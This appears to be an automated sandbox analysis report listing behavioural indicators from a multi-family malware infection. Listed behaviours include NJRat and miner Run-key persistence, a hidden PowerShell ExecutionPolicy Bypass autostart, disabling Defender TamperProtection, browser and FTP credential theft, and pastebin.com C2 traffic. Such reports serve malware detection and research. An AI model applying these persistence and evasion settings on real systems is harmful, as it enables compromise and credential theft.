\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine 1H10C4.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine 99add6fb7b.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine ecb5f9ca12.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Wine defnur.exe -
Loads dropped DLL 64 IoCs
Processes:
knotc.exeIMG001.exeinstall_lodop32.exeLoader.exerundll32.exe5D72.tmp.zx.exepid Process 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 792 knotc.exe 6832 IMG001.exe 6832 IMG001.exe 6832 IMG001.exe 6832 IMG001.exe 6832 IMG001.exe 6832 IMG001.exe 6832 IMG001.exe 6832 IMG001.exe 6832 IMG001.exe 780 install_lodop32.exe 6832 IMG001.exe 6832 IMG001.exe 5876 Loader.exe 968 rundll32.exe 6832 IMG001.exe 6832 IMG001.exe 6832 IMG001.exe 6832 IMG001.exe 5424 5D72.tmp.zx.exe 5424 5D72.tmp.zx.exe 5424 5D72.tmp.zx.exe 5424 5D72.tmp.zx.exe 5424 5D72.tmp.zx.exe 6832 IMG001.exe 6832 IMG001.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Processes:
resource yara_rule behavioral1/files/0x002600000002ac71-3973.dat vmprotect behavioral1/memory/5308-3978-0x0000000000400000-0x000000000082B000-memory.dmp vmprotect behavioral1/memory/5308-4002-0x0000000000400000-0x000000000082B000-memory.dmp vmprotect -
Processes:
ae588fb112.exe4C065K.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features ae588fb112.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ae588fb112.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 4C065K.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
caspol.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 25 IoCs
Processes:
skotes.exepowershell.exeIMG001.exereg.exeC4h88.exeA4Q93.exejerniuiopu.exeNJRat.exezcc.exedllhost.exeserver.exemsiexec.exet1.exehoro.exeaudiodg.exesvchost.exeTikTok18.exe69e99dc7e7.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\99add6fb7b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009744001\\99add6fb7b.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\MhitoCgZbIyeGzn.ps1\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" IMG001.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C4h88.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" A4Q93.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\NET framework = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\jerniuiopu.exe\"" jerniuiopu.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\69e99dc7e7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005824001\\69e99dc7e7.exe" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\NJRat.exe\" .." NJRat.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\BDEFAF8F05CB1068540764\\BDEFAF8F05CB1068540764.exe" zcc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\NJRat.exe\" .." NJRat.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost.exe = "\"C:\\ProgramData\\dllhost.exe\" .." dllhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\af0aa29f43924811e1101d2b844fbfd3 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." server.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\BDEFAF8F05CB1068540764\\BDEFAF8F05CB1068540764.exe" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" t1.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost.exe = "\"C:\\ProgramData\\dllhost.exe\" .." dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\af0aa29f43924811e1101d2b844fbfd3 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." server.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" horo.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\BDEFAF8F05CB1068540764\\BDEFAF8F05CB1068540764.exe" audiodg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\22277f3eaa.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009746001\\22277f3eaa.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\59b2d16d94.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009745001\\59b2d16d94.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\ae588fb112.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1009747001\\ae588fb112.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" TikTok18.exe Set value (str) \REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\kreon = "C:\\Users\\Admin\\AppData\\Local\\kreon.exe" 69e99dc7e7.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
IMG001.exedescription ioc Process File opened (read-only) \??\E: IMG001.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
Processes:
flow ioc 13060 pastebin.com 13867 pastebin.com 11438 pastebin.com 12436 pastebin.com 14323 pastebin.com 10290 pastebin.com 11044 pastebin.com 14569 pastebin.com 15193 pastebin.com 13650 pastebin.com 14040 pastebin.com 14957 pastebin.com 11893 pastebin.com 15471 pastebin.com 14235 pastebin.com 12433 pastebin.com 13258 pastebin.com 10485 pastebin.com 10836 pastebin.com 11615 pastebin.com 12507 pastebin.com 14608 pastebin.com 10373 pastebin.com 10885 pastebin.com 10916 pastebin.com 15842 pastebin.com 15973 pastebin.com 16186 pastebin.com 10655 pastebin.com 13354 pastebin.com 13529 pastebin.com 15347 pastebin.com 16168 pastebin.com 12637 pastebin.com 12669 pastebin.com 10972 pastebin.com 13367 pastebin.com 10520 pastebin.com 12044 pastebin.com 10365 pastebin.com 11884 pastebin.com 13997 pastebin.com 13581 pastebin.com 15835 pastebin.com 10403 pastebin.com 13225 pastebin.com 13535 pastebin.com 15613 pastebin.com 11221 pastebin.com 14590 pastebin.com 16194 pastebin.com 14713 pastebin.com 16117 pastebin.com 12043 pastebin.com 13148 pastebin.com 12089 pastebin.com 12810 pastebin.com 13038 pastebin.com 14066 pastebin.com 14587 pastebin.com 10876 pastebin.com 14951 pastebin.com 15178 pastebin.com 11732 pastebin.com -
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com 153 api.ipify.org 173 api.ipify.org 179 api.ipify.org 195 api.ipify.org 48 api.ipify.org 69 ip-api.com 168 api.ipify.org 3543 ip-api.com -
Processes:
cmd.exeARP.EXEcmd.exeARP.EXEpid Process 5176 2788 1660 cmd.exe 1552 ARP.EXE 6392 cmd.exe 4572 ARP.EXE -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid Process 5180 powercfg.exe 3740 powercfg.exe 5996 cmd.exe 4800 powercfg.exe 5504 powercfg.exe 880 powercfg.exe 428 powercfg.exe 5916 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/files/0x000700000002a697-2954.dat autoit_exe -
Drops file in System32 directory 7 IoCs
Processes:
main-pc.exeplswork.exediscord.exedescription ioc Process File opened for modification C:\Windows\system32\SubDir\main-pc.exe main-pc.exe File opened for modification C:\Windows\system32\SubDir main-pc.exe File created C:\Windows\system32\SubDir\Client.exe plswork.exe File opened for modification C:\Windows\system32\SubDir\Client.exe plswork.exe File created C:\Windows\system32\SubDir\main-pc.exe discord.exe File opened for modification C:\Windows\system32\SubDir\main-pc.exe discord.exe File opened for modification C:\Windows\system32\SubDir discord.exe -
Enumerates processes with tasklist 1 TTPs 14 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid Process 7024 tasklist.exe 464 876 tasklist.exe 6272 9040 3564 tasklist.exe 3004 tasklist.exe 4288 tasklist.exe 5604 tasklist.exe 5552 tasklist.exe 3700 tasklist.exe 3228 tasklist.exe 1484 tasklist.exe 5572 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 32 IoCs
Processes:
random.exeskotes.exerodda.exeL.exeknotc.exe99add6fb7b.exe59b2d16d94.exeae588fb112.exeskotes.exec04c9bc948.exeecb5f9ca12.exeskotes.exeskotes.exe%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exeskotes.exeskotes.exeskotes.exeskotes.exeskotes.exeskotes.exeama.exedefnur.exe1H10C4.exe2Z1002.exe3H03E.exe4C065K.exedefnur.exeskotes.exeskotes.exedefnur.exeskotes.exedefnur.exepid Process 4924 random.exe 3352 skotes.exe 872 rodda.exe 2752 L.exe 792 knotc.exe 6524 99add6fb7b.exe 7132 59b2d16d94.exe 6784 ae588fb112.exe 4920 skotes.exe 5784 c04c9bc948.exe 2844 ecb5f9ca12.exe 5016 skotes.exe 6084 skotes.exe 5308 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe 6356 skotes.exe 6484 skotes.exe 2692 skotes.exe 6904 skotes.exe 5380 skotes.exe 6404 skotes.exe 6340 ama.exe 6296 defnur.exe 5876 1H10C4.exe 1124 2Z1002.exe 6476 3H03E.exe 7032 4C065K.exe 1884 defnur.exe 1188 skotes.exe 4520 skotes.exe 6840 defnur.exe 1092 skotes.exe 692 defnur.exe -
Suspicious use of SetThreadContext 16 IoCs
Processes:
vg9qcBa.exeReynolds.comReynolds.comwinupsecvmgr.exesurfex.exepostbox.exe88aext0k.exeLoader.exeRambledMime.exeRegAsm.execaspol.exezcc.execonhost.exedescription pid Process procid_target PID 3036 set thread context of 4544 3036 vg9qcBa.exe 97 PID 868 set thread context of 7004 868 Reynolds.com 162 PID 7004 set thread context of 1704 7004 Reynolds.com 189 PID 3456 set thread context of 5752 3456 winupsecvmgr.exe 255 PID 3456 set thread context of 6316 3456 winupsecvmgr.exe 256 PID 6656 set thread context of 4380 6656 surfex.exe 371 PID 5524 set thread context of 1184 5524 postbox.exe 477 PID 5788 set thread context of 7092 5788 88aext0k.exe 724 PID 5876 set thread context of 4896 5876 Loader.exe 756 PID 4652 set thread context of 1888 4652 RambledMime.exe 759 PID 1888 set thread context of 5604 1888 RegAsm.exe 765 PID 2940 set thread context of 5840 2940 caspol.exe 851 PID 2932 set thread context of 2636 2932 zcc.exe 883 PID 2932 set thread context of 6588 2932 zcc.exe 882 PID 2932 set thread context of 7000 2932 zcc.exe 884 PID 2552 set thread context of 1264 2552 conhost.exe 916 -
Processes:
resource yara_rule behavioral1/files/0x001d00000002acd6-4325.dat upx behavioral1/memory/780-4332-0x0000000000400000-0x00000000006F2000-memory.dmp upx behavioral1/memory/780-4340-0x00000000692F0000-0x00000000697F0000-memory.dmp upx behavioral1/files/0x001b00000002ace9-4347.dat upx behavioral1/memory/780-4395-0x0000000000400000-0x00000000006F2000-memory.dmp upx behavioral1/memory/780-4399-0x00000000692F0000-0x00000000697F0000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
Processes:
install_lodop32.exedescription ioc Process File created C:\Program Files (x86)\MountTaiSoftware\Lodop\CAOSOFT_WEB_PRINT_lodop.ocx install_lodop32.exe File created C:\Program Files (x86)\MountTaiSoftware\Lodop\NPCAOSOFT_WEB_PRINT_lodop.dll install_lodop32.exe -
Drops file in Windows directory 22 IoCs
Processes:
0fVlNye.exet1.exechrome.exerandom.exeVBVEd6f.exefseawd.exechrome.exeschtasks.exeama.exechrome.exedescription ioc Process File opened for modification C:\Windows\TeddySecretariat 0fVlNye.exe File opened for modification C:\Windows\sysnldcvmr.exe t1.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\Tasks\skotes.job random.exe File opened for modification C:\Windows\DownReceptor 0fVlNye.exe File opened for modification C:\Windows\ComfortSick 0fVlNye.exe File opened for modification C:\Windows\UruguayNorthern 0fVlNye.exe File opened for modification C:\Windows\RipeHaiti VBVEd6f.exe File opened for modification C:\Windows\IdeasApp 0fVlNye.exe File opened for modification C:\Windows\JoiningMazda 0fVlNye.exe File opened for modification C:\Windows\OrganDiscretion 0fVlNye.exe File created C:\Windows\sysnldcvmr.exe t1.exe File created C:\Windows\Tasks\Test Task17.job fseawd.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\Tasks\UAC.job schtasks.exe File created C:\Windows\Tasks\defnur.job ama.exe File opened for modification C:\Windows\CentralAvoiding 0fVlNye.exe File opened for modification C:\Windows\VatBukkake 0fVlNye.exe File opened for modification C:\Windows\KeyboardsTwin 0fVlNye.exe File opened for modification C:\Windows\CoCurious VBVEd6f.exe File opened for modification C:\Windows\MozambiqueAppropriate 0fVlNye.exe File opened for modification C:\Windows\SystemTemp chrome.exe -
Detects Pyinstaller 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x001900000002ab22-1330.dat pyinstaller behavioral1/files/0x001a00000002ad6b-5572.dat pyinstaller -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
Processes:
resource yara_rule behavioral1/files/0x001a00000002ae56-7437.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 872 3100 WerFault.exe 123 6644 2844 WerFault.exe 233 2824 3856 WerFault.exe 670 2060 2020 WerFault.exe 809 5844 7284 1479 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exeschtasks.exenet.execmd.exefindstr.exeLoader.exe4C065K.execmd.execmd.exetimeout.execmd.execmd.exePING.EXEtaskkill.exenet.exereg.exetftp.exefind.exePING.EXENJRat.exexcopy.exeserver.execmd.exetaskkill.execmd.exenet.exenetsh.exePING.EXEcmd.exetasklist.exenet.exenet.execmd.exePING.EXEnet.exePING.EXEnet.exeschtasks.execmd.exeschtasks.execmd.exenet.exeKuwaitSetupHockey.tmpnet.exe22277f3eaa.exetaskkill.exexcopy.exexcopy.exetaskkill.exexcopy.execmd.exenet.execryyy.exeschtasks.execmd.execmd.exenet.exehoro.exenet.exetaskkill.exechoice.exe2217325085.exetasklist.exexcopy.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Loader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4C065K.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tftp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NJRat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KuwaitSetupHockey.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22277f3eaa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cryyy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language horo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2217325085.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEcmd.exePING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid Process 6860 PING.EXE 4940 PING.EXE 3452 PING.EXE 4368 PING.EXE 4960 6564 6368 PING.EXE 5372 PING.EXE 7472 5768 PING.EXE 6052 PING.EXE 3936 PING.EXE 2288 PING.EXE 4892 PING.EXE 4512 PING.EXE 5256 1508 cmd.exe 6152 PING.EXE 3036 PING.EXE 3140 PING.EXE 5368 PING.EXE 3448 PING.EXE 2648 PING.EXE 4620 PING.EXE 6236 6236 1276 PING.EXE 5524 PING.EXE 1500 PING.EXE 6276 PING.EXE 6696 PING.EXE 3672 PING.EXE 2040 PING.EXE 6712 PING.EXE 10048 5776 PING.EXE 848 PING.EXE 5544 4884 PING.EXE 6972 PING.EXE 4036 PING.EXE 5020 PING.EXE 6324 PING.EXE 6800 PING.EXE 1384 PING.EXE 5936 PING.EXE 5904 PING.EXE 3544 PING.EXE 7144 PING.EXE 1096 PING.EXE 7456 3744 PING.EXE 5168 PING.EXE 3696 PING.EXE 6612 PING.EXE 5772 PING.EXE 6132 PING.EXE 2788 PING.EXE 3324 PING.EXE 576 1432 PING.EXE 1704 PING.EXE 5656 PING.EXE 492 PING.EXE -
NSIS installer 6 IoCs
Processes:
resource yara_rule behavioral1/files/0x001c00000002ac59-3920.dat nsis_installer_1 behavioral1/files/0x001c00000002ac59-3920.dat nsis_installer_2 behavioral1/files/0x001c00000002ad6a-4836.dat nsis_installer_1 behavioral1/files/0x001c00000002ad6a-4836.dat nsis_installer_2 behavioral1/files/0x001c00000002ae51-7614.dat nsis_installer_1 behavioral1/files/0x001c00000002ae51-7614.dat nsis_installer_2 -
